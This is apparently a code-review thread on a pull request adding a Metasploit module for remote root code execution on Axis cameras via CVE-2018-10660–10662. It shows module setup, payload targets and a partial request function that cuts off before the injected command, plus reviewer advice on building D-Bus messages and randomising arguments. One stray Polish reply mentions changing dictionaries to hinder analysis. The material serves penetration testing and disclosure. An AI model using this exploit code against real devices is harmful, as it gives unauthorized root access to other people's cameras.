modules/exploits/linux/http/axis_srv_parhand_rce.rb

```diff
@@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Axis Camera .srv/parhand RCE',
+      'Description'    => %q{
+        This module exploits an auth bypass in .srv functionality and a
+        command injection in parhand to execute code as the root user.
+      },
+      'Author'         => [
+        'Or Peles',       # Vulnerability discovery (VDOO)
+        'wvu',            # Metasploit module
+        'Brent Cook',     # Metasploit module
+        'Jacob Robles',   # Metasploit module
+        'Matthew Kienow', # Metasploit module
+        'Wei Chen',       # Metasploit module
+        'Shelby Pace',    # Metasploit module
+        'Chris Lee',      # Metasploit module
+        'Cale Black'      # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2018-10660'],
+        ['CVE', '2018-10661'],
+        ['CVE', '2018-10662'],
+        ['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/']
+      ],
+      'DisclosureDate' => 'Jun 18 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix', 'linux'],
+      'Arch'           => [ARCH_CMD, ARCH_ARMLE],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Unix In-Memory',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD,
+         'Type'        => :unix_memory,
+         'Payload'     => {'BadChars' => ' '}
+        ],
+        ['Linux Dropper',
+         'Platform'    => 'linux',
+         'Arch'        => ARCH_ARMLE,
+         'Type'        => :linux_dropper
+        ]
+      ],
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      # TODO: Make this work
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    rand_srv = "#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"
+
+    vprint_status(cmd)
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => "/index.html/#{rand_srv}",
+      'vars_post' => {
+        'action'  => 'dbus',
+        # TODO: Break down this line
```

Comment:
Seeing as you're crafting D-Bus messages twice, may as well wrap it in a method.

[Here](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb#L98) is some pretty code for formatting D-Bus messages. It's designed for local exploitation, but can easily be reworked.

```ruby
  def dbus_send(dest:, type:, path:, interface:, contents:)
    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
  end
```

`--print-reply` is optional, and may or may not be useful in this instance, depending whether the server returns a reply.

As for randomizing the arguments, it's unlikely that `#{path} #{interface} #{contents}` can be randomised. Not sure about `--system` and ` --dest=#{dest}`.

Reply:
> randomizing

> randomised

Reply:
Zmieniam słowniki, aby utrudnić analizę.

Reply:
I've created a method that's suitable for the exploit. The server doesn't return a reply. I was thinking of randomizing the order of arguments, but I think that's overkill for a network camera exploit.